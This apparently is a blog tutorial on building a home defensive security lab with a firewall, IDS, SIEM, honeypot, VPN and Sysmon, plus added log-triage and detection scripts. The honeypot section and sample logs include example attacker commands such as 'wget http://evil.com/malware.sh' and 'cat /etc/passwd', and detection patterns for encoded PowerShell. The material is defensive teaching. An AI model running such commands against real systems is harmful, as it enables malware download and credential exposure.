Build Your Own Blue Team: ideas PT2

Breaking into systems is fun. Knowing when someone is breaking into yours? That’s power.

If Part 1 of this series was about arming yourself with offensive tools, this post is about building the walls, watchtowers, and alarm systems. A home lab with only attack tools is like a martial arts gym with no sparring partners — you’re throwing punches into the air. The real learning happens when you build infrastructure worth defending and then try to spot your own attacks hitting it.

The eight tools in this post will give you a complete defensive security stack: a firewall to segment and control traffic, an intrusion detection system to flag threats, a SIEM to aggregate and analyse logs, a honeypot to trap intruders, a VPN for secure remote access, and endpoint monitoring to see what’s happening on your Windows machines. Together, they form the kind of detection pipeline you’d find in a professional Security Operations Centre.

Let’s build it.


1. pfSense — The Firewall That Runs Your Lab

Every serious home lab starts with a proper firewall, and pfSense is the gold standard for open-source firewall/router software. Built on FreeBSD, it gives you enterprise-grade features — firewall rules, NAT, DHCP, DNS, VLANs, VPN, traffic shaping — all managed through a clean web interface. If your lab currently has everything dumped on a single flat network, pfSense is the tool that changes that.

How to Get It

Head to pfsense.org/download. Note that Netgate (the company behind pfSense) now promotes pfSense Plus as their primary offering. The free Community Edition (CE) is still available, but you may need to look for it specifically on the download page — it’s not always front and centre. Choose the AMD64 architecture and the ISO installer.

How to Install It

pfSense sits between your networks, so it needs at least two network interfaces — one for WAN (your home network / internet) and one for LAN (your lab network).

In a virtual environment (VirtualBox/Proxmox):

  1. Create a new VM with 1GB RAM, 1 CPU, and 8GB disk.
  2. Attach two network adapters: Adapter 1 as Bridged (WAN) and Adapter 2 as Host-Only or Internal Network (LAN).
  3. Boot from the ISO and follow the installer. It takes about five minutes.
  4. After reboot, pfSense will ask you to assign interfaces. Assign your WAN and LAN adapters.
  5. The LAN interface gets a default IP of 192.168.1.1. From a machine on the LAN side, browse to http://192.168.1.1 to access the web configurator.
  6. Default login is admin / pfsense. The setup wizard walks you through initial configuration.

On dedicated hardware: An old PC with two Ethernet ports works brilliantly. Netgate also sells purpose-built appliances if you want something compact and low-power.

How to Use It

Once pfSense is running, the real work begins — segmenting your lab:

  • Create VLANs: Separate your attack machines from your defence infrastructure. A typical setup might have VLAN 10 for management, VLAN 20 for your attack subnet, and VLAN 30 for your target/victim network.
  • Write firewall rules: Allow your Kali machine to reach vulnerable targets, but block your target VMs from reaching the internet. This mirrors real network segmentation.
  • Enable logging: Turn on firewall logging for blocked traffic. You’ll feed these logs into your SIEM later.
  • Set up DNS and DHCP: Let pfSense handle IP assignment and name resolution for your lab.

pfSense is also the integration point for several other tools on this list. Suricata (our next tool) runs directly as a pfSense package, and your firewall logs are some of the most valuable data you’ll send to your SIEM.


2. Suricata — Intrusion Detection That Watches the Wire

A firewall blocks traffic based on rules you write. An intrusion detection system (IDS) watches the traffic that does get through and alerts you when it sees something malicious. Suricata is an open-source IDS/IPS engine capable of real-time intrusion detection, inline intrusion prevention, network security monitoring, and offline packet processing.

How to Get It

Suricata’s documentation lives at docs.suricata.io. The best way to run it in a home lab is as a pfSense package.

How to Install It

On pfSense (recommended for home labs):

  1. Log into your pfSense web interface.
  2. Navigate to System → Package Manager → Available Packages.
  3. Search for “suricata” and click Install.
  4. After installation, go to Services → Suricata.
  5. Add an interface — typically your LAN interface so you can monitor all internal lab traffic.
  6. Enable the ET Open (Emerging Threats Open) ruleset. This free ruleset contains thousands of signatures for known attacks, malware, and suspicious behaviour.
  7. Start Suricata on the interface.

Standalone on Ubuntu/Debian:

sudo apt install suricata
sudo suricata-update # Downloads the latest rulesets
sudo suricata -c /etc/suricata/suricata.yaml -i eth0

How to Use It

Once Suricata is running, it will generate alerts in its eve.json log file (or in pfSense’s alerts tab). To see it in action, launch an Nmap scan from your Kali machine against a target on the monitored network:

nmap -sV -sC 192.168.30.10

Within seconds, Suricata should fire alerts about the port scan. You’ll see entries classifying the traffic as “Attempted Information Leak” or “Potentially Bad Traffic.”

The power of Suricata grows considerably when you start customising rules. For example, to alert on traffic that matches a known Metasploit payload signature, you can write custom Suricata rules and drop them into your local rules file. But even with the default rules, you’ll be surprised at how much suspicious activity Suricata flags — even in a lab environment.
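To see what those eve.json alerts look like once you stop reading them one at a time, here is an added triage script (not from the post or the Suricata project) that keeps only alert records, groups them by source, and flags a source that hits several distinct destination ports, which is what the Nmap scan above produces. The eve.json lines are constructed for the example, and the signature names on the 4444 line and the three-port threshold are assumptions.

```python
"""Triage Suricata eve.json: keep alert events, group by source, flag port scanners."""
import json
from collections import Counter, defaultdict

# Constructed sample eve.json lines (not real Suricata output). The field layout mirrors
# Suricata's EVE alert records: event_type, src_ip, dest_ip, dest_port, alert{...}.
# The last line is deliberately truncated to exercise the malformed-line handling.
SAMPLE_EVE = """\
{"timestamp":"2024-05-01T10:00:01Z","event_type":"alert","src_ip":"192.168.20.5","dest_ip":"192.168.30.10","dest_port":22,"proto":"TCP","alert":{"signature":"ET SCAN Potential SSH Scan","category":"Attempted Information Leak","severity":2}}
{"timestamp":"2024-05-01T10:00:02Z","event_type":"flow","src_ip":"192.168.20.5","dest_ip":"192.168.30.10","dest_port":80,"proto":"TCP"}
{"timestamp":"2024-05-01T10:00:02Z","event_type":"alert","src_ip":"192.168.20.5","dest_ip":"192.168.30.10","dest_port":3306,"proto":"TCP","alert":{"signature":"ET SCAN Suspicious inbound to mySQL port 3306","category":"Potentially Bad Traffic","severity":2}}
{"timestamp":"2024-05-01T10:00:03Z","event_type":"alert","src_ip":"192.168.20.5","dest_ip":"192.168.30.10","dest_port":1433,"proto":"TCP","alert":{"signature":"ET SCAN Suspicious inbound to MSSQL port 1433","category":"Potentially Bad Traffic","severity":2}}
{"timestamp":"2024-05-01T10:00:03Z","event_type":"alert","src_ip":"192.168.20.5","dest_ip":"192.168.30.10","dest_port":5432,"proto":"TCP","alert":{"signature":"ET SCAN Suspicious inbound to PostgreSQL port 5432","category":"Potentially Bad Traffic","severity":2}}
{"timestamp":"2024-05-01T10:00:09Z","event_type":"alert","src_ip":"192.168.30.10","dest_ip":"192.168.20.5","dest_port":4444,"proto":"TCP","alert":{"signature":"LAB Outbound connection to port 4444 (constructed signature)","category":"A Network Trojan was detected","severity":1}}
{"timestamp":"2024-05-01T10:00:10Z","event_type":"alert","src_ip":"192.168.20.5"
"""


def parse_alerts(eve_text):
    """Return the alert records from eve.json text, skipping non-alert and malformed lines."""
    alerts = []
    for line in eve_text.splitlines():
        if not line.strip():
            continue
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            continue  # a line cut mid-write (e.g. during rotation) must not abort triage
        if event.get("event_type") == "alert":
            alerts.append(event)
    return alerts


def summarise_by_source(alerts):
    """Per source IP: signature counts, distinct destination ports and the most severe alert."""
    summary = defaultdict(lambda: {"signatures": Counter(), "ports": set(), "top_severity": 9})
    for ev in alerts:
        entry = summary[ev["src_ip"]]
        entry["signatures"][ev["alert"]["signature"]] += 1
        entry["ports"].add(ev["dest_port"])
        entry["top_severity"] = min(entry["top_severity"], ev["alert"]["severity"])  # 1 = highest
    return dict(summary)


def flag_scanners(alerts, min_ports=3):
    """Sources whose alerts touch at least min_ports distinct destination ports look like a scan."""
    summary = summarise_by_source(alerts)
    return sorted(ip for ip, s in summary.items() if len(s["ports"]) >= min_ports)


if __name__ == "__main__":
    alerts = parse_alerts(SAMPLE_EVE)
    for ip, s in summarise_by_source(alerts).items():
        top = s["signatures"].most_common(1)[0][0]
        print(f"{ip}: severity {s['top_severity']}, {len(s['ports'])} ports, top signature {top!r}")
    print("likely scanners:", flag_scanners(alerts))
```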


3. Wazuh — Your Free SIEM/XDR Platform

Individual logs from a firewall, an IDS, and endpoints are useful. But when you correlate them all in one place, patterns emerge that you’d never see in isolation. That’s what a SIEM (Security Information and Event Management) does, and Wazuh is one of the best free options available. It combines log aggregation, threat detection, vulnerability scanning, compliance monitoring, and incident response into a single platform.

How to Get It

Visit wazuh.com/install for the installation guide. Check the documentation for the latest version number before running any commands — Wazuh releases frequently and the URLs include version numbers.

How to Install It

Wazuh has three components: the Wazuh server (processes alerts), the Wazuh indexer (stores and searches data, based on OpenSearch), and the Wazuh dashboard (web UI).

Quickstart (all-in-one on a single server):

curl -sO https://packages.wazuh.com/4.9/wazuh-install.sh
sudo bash wazuh-install.sh -a

(Replace 4.9 with the current version from the Wazuh documentation.)

This installs everything on one machine. It takes 10–15 minutes and needs at least 4GB of RAM (8GB recommended). At the end, the script prints the dashboard URL and admin credentials.

Then install agents on your lab machines:

On a Linux target, download the agent package and point it at your Wazuh server. The Wazuh documentation provides copy-pasteable commands for each OS, but the process looks like this:

# Download the agent package (check docs.wazuh.com for the current version and URL)
wget https://packages.wazuh.com/4.x/apt/pool/main/w/wazuh-agent/wazuh-agent_<version>_amd64.deb
sudo WAZUH_MANAGER='<your-wazuh-server-ip>' dpkg -i wazuh-agent_*.deb
sudo systemctl daemon-reload
sudo systemctl enable wazuh-agent
sudo systemctl start wazuh-agent

On a Windows target, download the MSI agent installer from the Wazuh downloads page and point it at your Wazuh server’s IP during setup.

How to Use It

Open the Wazuh dashboard (usually https://<server-ip>:443) and you’ll see a bird’s-eye view of your lab:

  • Security Events: Every alert from every agent, categorised by severity.
  • Integrity Monitoring: Wazuh watches critical files on your endpoints and alerts when they change (think: an attacker modifying /etc/passwd).
  • Vulnerability Detection: Wazuh scans installed packages against CVE databases.
  • Active Response: Configure Wazuh to automatically block IPs or kill processes when specific conditions are met.

Here’s where the magic happens: launch an attack from your Kali machine against a Wazuh-monitored target. If you brute-force SSH, Wazuh will detect repeated authentication failures and can automatically block your attacking IP using Active Response. You’re now seeing both sides — the attack and the detection — in real time.
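The brute-force-then-block loop above is a frequency rule feeding an active response. The added script below (not Wazuh code and not from the post) shows the same logic in miniature: count sshd authentication failures per source inside a sliding time window, and issue a timed block once a threshold is crossed. The auth.log lines are constructed, and the threshold, window and block duration are assumed values, not Wazuh’s defaults.

```python
"""Sliding-window SSH brute-force detector with an active-response style block decision."""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sshd lines in syslog format (no real host). One source fails five times in
# six seconds; another fails twice, three minutes apart, and must not be blocked.
SAMPLE_AUTH_LOG = """\
May  1 10:00:01 target sshd[2101]: Failed password for root from 192.168.20.5 port 50122 ssh2
May  1 10:00:02 target sshd[2103]: Failed password for root from 192.168.20.5 port 50123 ssh2
May  1 10:00:03 target sshd[2105]: Failed password for invalid user admin from 192.168.20.5 port 50124 ssh2
May  1 10:00:04 target sshd[2107]: Failed password for root from 192.168.20.5 port 50125 ssh2
May  1 10:00:05 target sshd[2109]: Accepted publickey for alice from 192.168.10.7 port 40001 ssh2
May  1 10:00:06 target sshd[2111]: Failed password for root from 192.168.20.5 port 50126 ssh2
May  1 10:05:00 target sshd[2150]: Failed password for root from 192.168.10.7 port 40002 ssh2
May  1 10:08:00 target sshd[2151]: Failed password for root from 192.168.10.7 port 40003 ssh2
"""

FAILED_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: Failed password for "
    r"(?:invalid user )?\S+ from (?P<ip>[\d.]+) port \d+"
)


def detect_bruteforce(lines, threshold=5, window=timedelta(seconds=120),
                      block_for=timedelta(seconds=180)):
    """Return {ip: block_time} for sources with >= threshold failures inside the window.

    Mirrors a SIEM frequency/timeframe rule whose match triggers a block with a timeout:
    once blocked, a source is not re-blocked until block_for has elapsed.
    """
    recent = defaultdict(deque)   # ip -> timestamps of failures still inside the window
    blocked = {}                  # ip -> when the block was issued
    for line in lines:
        m = FAILED_RE.match(line)
        if not m:
            continue
        # syslog lines carry no year; 2024 is assumed so the timestamps can be compared
        ts = datetime.strptime(m["ts"], "%b %d %H:%M:%S").replace(year=2024)
        ip = m["ip"]
        q = recent[ip]
        q.append(ts)
        while q and ts - q[0] > window:
            q.popleft()           # drop failures that have aged out of the window
        if len(q) >= threshold and (ip not in blocked or ts - blocked[ip] > block_for):
            blocked[ip] = ts
            q.clear()
    return blocked


if __name__ == "__main__":
    for ip, when in detect_bruteforce(SAMPLE_AUTH_LOG.splitlines()).items():
        print(f"block {ip} at {when:%H:%M:%S}")
```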


4. OpenSearch — The Engine Behind Your Dashboards

OpenSearch is the search and analytics engine that powers Wazuh’s data storage and visualisation. If you installed Wazuh with the all-in-one script, you already have it. But understanding OpenSearch separately is valuable because it’s the same technology stack (forked from Elasticsearch) used across the industry for log analysis, and it can ingest data from far more sources than just Wazuh.

How to Get It

Visit opensearch.org for standalone installation, or know that it’s already bundled with Wazuh.

How to Install It (Standalone)

If you want to run OpenSearch independently to ingest additional data sources:

# Using Docker. Both containers go on one user-defined network so that Dashboards can
# reach OpenSearch by container name; "localhost" inside the Dashboards container would
# point at the Dashboards container itself, not at OpenSearch.
docker network create opensearch-net
docker pull opensearchproject/opensearch:latest
docker pull opensearchproject/opensearch-dashboards:latest
docker run -d --name opensearch --network opensearch-net -p 9200:9200 -p 9600:9600 \
-e "discovery.type=single-node" \
-e "OPENSEARCH_INITIAL_ADMIN_PASSWORD=YourStr0ngP@ss!" \
opensearchproject/opensearch:latest
docker run -d --name opensearch-dashboards --network opensearch-net -p 5601:5601 \
-e 'OPENSEARCH_HOSTS=["https://opensearch:9200"]' \
opensearchproject/opensearch-dashboards:latest

How to Use It

OpenSearch Dashboards (accessible on port 5601) is where you build visualisations:

  • Discover: Search through raw log data with full-text queries. Type rule.description: "brute force" to find all brute-force alerts.
  • Visualise: Build charts — bar graphs showing alerts over time, pie charts breaking down attack categories, geographic maps of source IPs.
  • Dashboards: Combine multiple visualisations into a single view. Build a “SOC Dashboard” that shows your top 10 alert types, most targeted hosts, and a timeline of events.

When integrated with Wazuh, OpenSearch indexes every security event, making it searchable within seconds. The combination gives you the same data pipeline that enterprise security teams pay tens of thousands of pounds for — except yours is free and running in your spare room.


5. Security Onion — Threat Detection in a Box

Security Onion is a Linux distribution designed specifically for threat hunting, network security monitoring, and log management. It bundles together a curated collection of tools — Suricata, Zeek, Elasticsearch, Kibana, and others — into a cohesive platform with its own web interface. Think of it as an all-in-one security monitoring appliance.

A note on overlap: If you’ve already set up Suricata, Wazuh, and OpenSearch from the previous sections, you’ll notice that Security Onion covers some of the same ground. You don’t need both stacks running simultaneously. Security Onion is an excellent alternative if you’d prefer a single integrated deployment rather than assembling the components individually. It’s also complementary — its deep packet capture and Zeek network metadata provide visibility that goes beyond what Wazuh and Suricata alone offer. Choose the approach that suits your learning goals: individual components for understanding how each piece works, or Security Onion for a ready-made monitoring platform.

How to Get It

Download the ISO from securityonionsolutions.com.

How to Install It

  1. Create a VM with at least 4 CPU cores, 16GB RAM, and 200GB of disk space. Security Onion is resource-hungry because it’s running multiple tools simultaneously.
  2. Attach two network interfaces: one for management and one as a monitoring/sniffing interface.
  3. Boot from the ISO and choose Standalone for a single-server deployment.
  4. The setup wizard guides you through network configuration, component selection, and user creation. This takes about 20–30 minutes.
  5. Once complete, access the Security Onion Console (SOC) web interface from a machine on the management network.

How to Use It

Security Onion’s web interface provides several key views:

  • Alerts: Suricata IDS alerts from monitored traffic, complete with packet details.
  • Hunt: Zeek network logs that show every connection, DNS query, HTTP request, and file transfer on your network — even if nothing triggered an alert.
  • PCAP: Full packet capture that lets you replay and analyse any network session after the fact.
  • Dashboards: Pre-built dashboards showing network activity summaries.

The killer use case: run an attack against a monitored target, then switch to Security Onion and trace exactly what the attack looked like from the network’s perspective. See the Nmap SYN scan in the Zeek connection logs. Find your Metasploit exploit in the Suricata alerts. Follow the data exfiltration in the PCAP. This kind of dual-perspective analysis is incredibly valuable for understanding how attacks manifest on the wire.


6. Cowrie — An SSH Honeypot That Traps Attackers

Honeypots are decoy systems designed to lure attackers, waste their time, and record everything they do. Cowrie is a medium-interaction SSH and Telnet honeypot that emulates a Linux server. When an attacker connects and tries to brute-force their way in, Cowrie lets them “succeed” — then logs every command they type, every file they download, and every session they initiate.

How to Get It

Clone the repository from GitHub.

How to Install It

# Install dependencies
sudo apt install git python3-venv python3-dev libssl-dev libffi-dev
# Clone and set up
git clone https://github.com/cowrie/cowrie.git
cd cowrie
python3 -m venv cowrie-env
source cowrie-env/bin/activate
pip install --upgrade pip
pip install -r requirements.txt
# Configure
cp etc/cowrie.cfg.dist etc/cowrie.cfg

Edit etc/cowrie.cfg to set the hostname, listen port (default 2222), and log output format. For lab use, the defaults work well. To listen on port 22, you’ll need to redirect traffic with iptables:

sudo iptables -t nat -A PREROUTING -p tcp --dport 22 -j REDIRECT --to-port 2222

Start Cowrie:

bin/cowrie start

How to Use It

Once running, Cowrie presents a fake SSH login to anyone who connects. Try it yourself from Kali:

ssh root@<cowrie-ip>

Try common passwords — Cowrie is configured to accept certain credentials (configurable). Once “in,” you’ll see what looks like a real bash shell. Try ls, cat /etc/passwd, wget http://evil.com/malware.sh — Cowrie logs it all and even emulates a fake filesystem.

Check the logs in var/log/cowrie/cowrie.json. You’ll see every keystroke, every command, and every session. If an attacker downloads a file, Cowrie saves a copy for your analysis. This is pure gold for understanding attacker behaviour.

In your lab, point your Kali machine at Cowrie and run through a typical post-exploitation playbook. Then review the Cowrie logs and ask: “Would I have detected this? What gave the attacker away?”
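Reviewing cowrie.json line by line gets tedious after the second session. The added script below (not part of Cowrie or of the post) rebuilds each session from its event stream: login attempts, the commands typed, any file downloads, and the session duration, so you can answer “what did the attacker do once in?” per session. The log lines are constructed; the session ids, download hash and URL are placeholders.

```python
"""Rebuild attacker sessions from Cowrie's var/log/cowrie/cowrie.json."""
import json

# Constructed cowrie.json lines (not a real capture). Field names follow Cowrie's JSON
# output: eventid, session, src_ip, timestamp, plus the per-event fields used below.
SAMPLE_COWRIE = """\
{"eventid":"cowrie.session.connect","src_ip":"192.168.20.5","src_port":51000,"session":"a1b2c3d4e5f6","timestamp":"2024-05-01T10:10:00.000000Z","message":"New connection"}
{"eventid":"cowrie.login.failed","username":"root","password":"toor","session":"a1b2c3d4e5f6","src_ip":"192.168.20.5","timestamp":"2024-05-01T10:10:01.000000Z"}
{"eventid":"cowrie.login.success","username":"root","password":"123456","session":"a1b2c3d4e5f6","src_ip":"192.168.20.5","timestamp":"2024-05-01T10:10:02.000000Z"}
{"eventid":"cowrie.command.input","input":"uname -a","session":"a1b2c3d4e5f6","src_ip":"192.168.20.5","timestamp":"2024-05-01T10:10:03.000000Z"}
{"eventid":"cowrie.command.input","input":"cat /etc/passwd","session":"a1b2c3d4e5f6","src_ip":"192.168.20.5","timestamp":"2024-05-01T10:10:04.000000Z"}
{"eventid":"cowrie.command.input","input":"wget http://evil.example/malware.sh","session":"a1b2c3d4e5f6","src_ip":"192.168.20.5","timestamp":"2024-05-01T10:10:05.000000Z"}
{"eventid":"cowrie.session.file_download","url":"http://evil.example/malware.sh","outfile":"var/lib/cowrie/downloads/PLACEHOLDERSHA","shasum":"PLACEHOLDERSHA","session":"a1b2c3d4e5f6","src_ip":"192.168.20.5","timestamp":"2024-05-01T10:10:06.000000Z"}
{"eventid":"cowrie.session.closed","duration":7.1,"session":"a1b2c3d4e5f6","src_ip":"192.168.20.5","timestamp":"2024-05-01T10:10:07.000000Z"}
{"eventid":"cowrie.session.connect","src_ip":"192.168.20.9","src_port":51010,"session":"ffee00112233","timestamp":"2024-05-01T10:12:00.000000Z","message":"New connection"}
{"eventid":"cowrie.login.failed","username":"admin","password":"admin","session":"ffee00112233","src_ip":"192.168.20.9","timestamp":"2024-05-01T10:12:01.000000Z"}
{"eventid":"cowrie.session.closed","duration":1.2,"session":"ffee00112233","src_ip":"192.168.20.9","timestamp":"2024-05-01T10:12:02.000000Z"}
"""


def rebuild_sessions(cowrie_text):
    """Group events by session id into {session: {src_ip, logins, commands, downloads, duration}}."""
    sessions = {}
    for line in cowrie_text.splitlines():
        if not line.strip():
            continue
        ev = json.loads(line)
        s = sessions.setdefault(ev["session"], {"src_ip": ev.get("src_ip"), "logins": [],
                                                "commands": [], "downloads": [], "duration": None})
        eid = ev["eventid"]
        if eid in ("cowrie.login.failed", "cowrie.login.success"):
            s["logins"].append((ev["username"], ev["password"], eid.endswith("success")))
        elif eid == "cowrie.command.input":
            s["commands"].append(ev["input"])          # every command typed in the fake shell
        elif eid == "cowrie.session.file_download":
            s["downloads"].append((ev["url"], ev.get("shasum")))  # Cowrie kept a copy on disk
        elif eid == "cowrie.session.closed":
            s["duration"] = ev.get("duration")
    return sessions


def interactive_sessions(sessions):
    """Session ids where a login succeeded and at least one command was typed."""
    return [sid for sid, s in sessions.items()
            if any(ok for _, _, ok in s["logins"]) and s["commands"]]


def report(sessions):
    for sid, s in sessions.items():
        print(f"session {sid} from {s['src_ip']} ({s['duration']}s)")
        for user, pw, ok in s["logins"]:
            print(f"  login {user}:{pw} -> {'success' if ok else 'failed'}")
        for cmd in s["commands"]:
            print(f"  $ {cmd}")
        for url, sha in s["downloads"]:
            print(f"  download {url} (sha256 {sha})")


if __name__ == "__main__":
    report(rebuild_sessions(SAMPLE_COWRIE))
```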


7. WireGuard — Secure Remote Access to Your Lab

Your lab doesn’t have to stop at your front door. WireGuard is a modern VPN protocol that’s faster, simpler, and more secure than OpenVPN or IPsec. With WireGuard, you can securely access your entire home lab from anywhere — your phone, a coffee shop, another city — as if you were sitting on your home network.

How to Get It

Visit wireguard.com/install for platform-specific downloads.

How to Install It

On an Ubuntu/Debian server (or your pfSense box):

sudo apt install wireguard
# Generate server keys
wg genkey | tee server_private.key | wg pubkey > server_public.key

Create the server configuration at /etc/wireguard/wg0.conf:

[Interface]
PrivateKey = <server_private_key>
Address = 10.0.0.1/24
ListenPort = 51820
[Peer]
PublicKey = <client_public_key>
AllowedIPs = 10.0.0.2/32

Start the tunnel:

sudo wg-quick up wg0
sudo systemctl enable wg-quick@wg0

On your client device: Install the WireGuard app (available for Windows, macOS, Linux, iOS, Android), generate a keypair, and create a matching config that points to your server’s public IP and port.

Don’t forget to forward port 51820/UDP on your home router to your WireGuard server.

How to Use It

Once connected, your client device gets an IP on the 10.0.0.0/24 WireGuard network. With proper routing, you can now reach every machine in your lab. This means you can:

  • Run Metasploit from your laptop at work against your home lab targets (on your lunch break, of course).
  • Check your Wazuh dashboard from your phone.
  • SSH into any lab machine from anywhere.

WireGuard’s handshake takes milliseconds and the performance overhead is minimal. It uses modern cryptography (Curve25519, ChaCha20, BLAKE2s) and has a tiny codebase — around 4,000 lines of code — which means a smaller attack surface than legacy VPN solutions.


8. Sysmon — See Everything That Happens on Windows

Windows endpoints are the most common targets in real-world attacks, and the default Windows Event Log gives you frustratingly little visibility into what’s actually happening. Sysmon (System Monitor) is a free Microsoft Sysinternals tool that dramatically extends Windows logging — capturing process creation with full command lines, network connections, file creation timestamps, registry modifications, and more.

How to Get It

Download from Microsoft Sysinternals.

How to Install It

  1. Download and extract Sysmon.zip on your Windows lab VM.
  2. Download a community configuration file. The most popular is SwiftOnSecurity’s Sysmon config:

Invoke-WebRequest -Uri "https://raw.githubusercontent.com/SwiftOnSecurity/sysmon-config/master/sysmonconfig-export.xml" -OutFile sysmonconfig.xml

  3. Install Sysmon with the config:

.\Sysmon64.exe -accepteula -i sysmonconfig.xml

That’s it. Sysmon is now running as a service and logging to the Windows Event Log under Applications and Services Logs → Microsoft → Windows → Sysmon.

How to Use It

Open Event Viewer and navigate to the Sysmon log. You’ll see events for:

  • Event ID 1 (Process Creation): Every process that starts, with the full command line, parent process, and hashes of the executable. This catches things like powershell -enc <base64payload> that attackers love.
  • Event ID 3 (Network Connection): Outbound connections with destination IP, port, and the process that initiated them. Crucial for spotting command-and-control traffic.
  • Event ID 11 (File Create): New files dropped to disk, including in temp directories where malware often lands.
  • Event ID 13 (Registry Modification): Changes to Run keys, Services, and other persistence mechanisms.

The next-level move: configure a Wazuh agent on the same Windows machine to forward Sysmon events to your SIEM. Wazuh has built-in decoders for Sysmon events, so they’ll appear as structured, searchable security alerts in your dashboard. Now when you run a Metasploit exploit against your Windows target, you can see the entire kill chain — from the initial connection (Sysmon Event 3) to the payload execution (Event 1) to the persistence mechanism (Event 13) — all correlated in Wazuh.
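Event ID 1 only helps if you can read what a command line actually ran. The added script below (not from the post, Sysinternals or Wazuh) parses Sysmon events in the XML layout Event Viewer shows, picks out process-creation events whose command line carries -EncodedCommand, and decodes the UTF-16LE base64 so the analyst sees the script rather than the blob. The events are constructed, the encoded command is a harmless Get-Date, the hashes are placeholders, and the list of -enc abbreviations is an assumption.

```python
"""Parse Sysmon Event ID 1 XML and surface command lines hiding a script behind -EncodedCommand."""
import base64
import re
import xml.etree.ElementTree as ET

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}
# PowerShell accepts unambiguous prefixes of -EncodedCommand; this list of common ones is assumed.
ENC_RE = re.compile(r"(?i)(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)")

# Constructed encoded command; a real event carries whatever was actually run.
ENCODED = base64.b64encode("Get-Date".encode("utf-16le")).decode()

# Constructed Sysmon events in Event Viewer's XML-view layout (hashes are placeholders).
SAMPLE_EVENTS = [f"""<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
<System><Provider Name="Microsoft-Windows-Sysmon"/><EventID>1</EventID><Computer>LAB-WIN10</Computer></System>
<EventData><Data Name="UtcTime">2024-05-01 10:20:00.000</Data>
<Data Name="Image">C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe</Data>
<Data Name="CommandLine">powershell -nop -w hidden -enc {ENCODED}</Data>
<Data Name="ParentImage">C:\\Windows\\System32\\cmd.exe</Data>
<Data Name="Hashes">SHA256=PLACEHOLDER</Data></EventData></Event>""",
"""<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
<System><Provider Name="Microsoft-Windows-Sysmon"/><EventID>1</EventID><Computer>LAB-WIN10</Computer></System>
<EventData><Data Name="UtcTime">2024-05-01 10:21:00.000</Data>
<Data Name="Image">C:\\Windows\\System32\\notepad.exe</Data>
<Data Name="CommandLine">"C:\\Windows\\System32\\notepad.exe" notes.txt</Data>
<Data Name="ParentImage">C:\\Windows\\explorer.exe</Data>
<Data Name="Hashes">SHA256=PLACEHOLDER</Data></EventData></Event>"""]


def parse_event(xml_text):
    """Return {'EventID': int, 'Computer': str, plus every EventData field} for one Sysmon event."""
    root = ET.fromstring(xml_text)
    info = {"EventID": int(root.find("e:System/e:EventID", NS).text),
            "Computer": root.find("e:System/e:Computer", NS).text}
    for data in root.findall("e:EventData/e:Data", NS):
        info[data.get("Name")] = data.text or ""
    return info


def decode_encoded_command(command_line):
    """If the command line carries -enc <base64>, return the decoded UTF-16LE script, else None."""
    m = ENC_RE.search(command_line)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None  # not valid base64/UTF-16: still worth a look, but nothing to show


def find_encoded_powershell(events_xml):
    """Process-creation events whose command line hides a script behind -EncodedCommand."""
    hits = []
    for xml_text in events_xml:
        ev = parse_event(xml_text)
        if ev["EventID"] != 1:
            continue
        decoded = decode_encoded_command(ev.get("CommandLine", ""))
        if decoded is not None:
            hits.append({"host": ev["Computer"], "time": ev.get("UtcTime"),
                         "parent": ev.get("ParentImage"), "decoded": decoded})
    return hits


if __name__ == "__main__":
    for hit in find_encoded_powershell(SAMPLE_EVENTS):
        print(f"{hit['time']} {hit['host']} parent={hit['parent']} decoded={hit['decoded']!r}")
```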


The Complete Defensive Architecture

Here’s how all eight tools work together:

pfSense sits at the edge, segmenting your network into zones and logging all traffic decisions. Suricata runs on pfSense (or alongside it), inspecting packets for known attack signatures. Security Onion provides deeper network monitoring with full packet capture and Zeek connection logs.

Wazuh aggregates logs from everywhere — pfSense firewall logs, Suricata alerts, Sysmon events from Windows endpoints, and its own file integrity monitoring. OpenSearch indexes all of this data and makes it searchable, while the Wazuh dashboard gives you a unified view.

Cowrie sits on its own, quietly pretending to be a vulnerable SSH server and recording everything attackers do when they take the bait.

WireGuard ties it all together by giving you secure access to the entire lab from anywhere.

Sysmon ensures your Windows machines log everything that matters at the endpoint level.

This is a real detection pipeline. When you attack your own lab, you’ll see alerts fire, logs correlate, and dashboards light up. That feedback loop — attack, detect, analyse, improve — is how professional security teams operate. And now it’s running in your home.

In the final post of this series, we’ll cover advanced techniques: adversary emulation, automated configuration management, network forensics, and malware analysis. The tools that separate a hobbyist lab from a serious one.

Stay vigilant.